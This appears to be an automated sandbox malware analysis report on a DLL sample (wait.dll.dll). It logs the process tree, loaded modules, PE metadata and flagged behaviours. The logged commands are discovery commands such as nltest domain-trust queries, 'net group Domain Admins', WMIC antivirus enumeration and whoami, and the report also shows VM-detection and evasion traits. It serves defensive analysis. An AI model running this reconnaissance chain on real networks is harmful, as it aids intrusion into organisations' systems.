            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,JumpJump to behavior
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",JumpJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /allJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfoJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trustsJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trustsJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domainJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net view /allJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domainJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:ListJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c net config workstationJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installedJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe /c whoami /groupsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: ntdsapi.dll
            Source: C:\Windows\System32\nltest.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\nltest.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\nltest.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net.exeSection loaded: browcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net.exeSection loaded: browcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\whoami.exeSection loaded: version.dll
            Source: C:\Windows\System32\whoami.exeSection loaded: authz.dll
            Source: C:\Windows\System32\whoami.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\whoami.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\whoami.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
            Source: wait.dll.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: wait.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
            Source: wait.dll.dllStatic file information: File size 2151936 > 1048576
            Source: wait.dll.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x12fe00
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: wait.dll.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF
            Source: wait.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4538924938.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.4538185673.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, wait.dll.dll
            Source: wait.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: wait.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: wait.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: wait.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: wait.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4589E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,8_2_0E4589E4
            Source: wait.dll.dllStatic PE information: real checksum: 0x1d7e57 should be: 0x216e55
            Source: wait.dll.dllStatic PE information: section name: .didat
            Source: C:\Windows\System32\rundll32.exeCode function: 3_3_000001CEAFDF0105 push ecx; retf 3_3_000001CEAFDF010E
            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000027619780105 push ecx; retf 4_3_000002761978010E
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000002339FC40105 push ecx; retf 6_3_000002339FC4010E

            Persistence and Installation Behavior

            barindex
            Uses ipconfig to lookup or modify the Windows network settings
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all

            Boot Survival

            barindex
            Uses net.exe to modify the status of services
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Uses whoami command line tool to query computer and username
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\whoami.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\whoami.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4576DC rdtsc 8_2_0E4576DC
            Source: C:\Windows\explorer.exeCode function: 8_2_0E454948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,8_2_0E454948
            Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,3_2_000001CEAFC94D00
            Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,4_2_0000027619644D00
            Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,6_2_000002339FBA4D00
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_03038424
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_03037274
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_08387274
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_08388424
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_08857274
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_08858424
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CFDCBC WTSGetActiveConsoleSessionId,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetLastError,SetupDiGetClassDevsW,GetLastError,SetupDiGetDeviceInstanceIdW,GetLastError,StrStrIW,SetupDiGetDeviceRegistryPropertyW,lstrcmpiW,CM_Get_DevNode_Status,SetupDiOpenDevRegKey,RegCloseKey,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,CloseHandle,3_2_00007FF8A8CFDCBC
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2241Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 526Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6837Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876Jump to behavior
            Source: C:\Windows\System32\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-54165
            Source: C:\Windows\System32\rundll32.exeAPI coverage: 3.7 %
            Source: C:\Windows\System32\loaddll64.exe TID: 5856Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6448Thread sleep count: 2241 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 6448Thread sleep time: -2241000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 1276Thread sleep count: 526 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1276Thread sleep time: -52600s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6448Thread sleep count: 6837 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 6448Thread sleep time: -6837000s >= -30000sJump to behavior
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8D72E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,3_2_00007FF8A8D72E90
            Source: C:\Windows\explorer.exeCode function: 8_2_0303A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0303A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_03032B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_03032B28
            Source: C:\Windows\explorer.exeCode function: 8_2_030404C0 FindFirstFileW,8_2_030404C0
            Source: C:\Windows\explorer.exeCode function: 8_2_0838A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0838A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_083904C0 FindFirstFileW,8_2_083904C0
            Source: C:\Windows\explorer.exeCode function: 8_2_08382B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_08382B28
            Source: C:\Windows\explorer.exeCode function: 8_2_0885A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0885A8E0
            Source: C:\Windows\explorer.exeCode function: 8_2_088604C0 FindFirstFileW,8_2_088604C0
            Source: C:\Windows\explorer.exeCode function: 8_2_08852B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_08852B28
            Source: C:\Windows\explorer.exeCode function: 8_2_0E456604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,8_2_0E456604
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4516F4 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0E4516F4
            Source: C:\Windows\explorer.exeCode function: 8_2_0E515C40 FindFirstFileW,FindClose,8_2_0E515C40
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4F50D8 FindFirstFileA,8_2_0E4F50D8
            Source: C:\Windows\explorer.exeCode function: 8_2_0E4F5088 CloseHandle,GetCurrentProcessId,FindFirstFileA,FindClose,GetFileSize,8_2_0E4F5088
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CF9A80 GetSystemInfo,3_2_00007FF8A8CF9A80
            Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
            Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
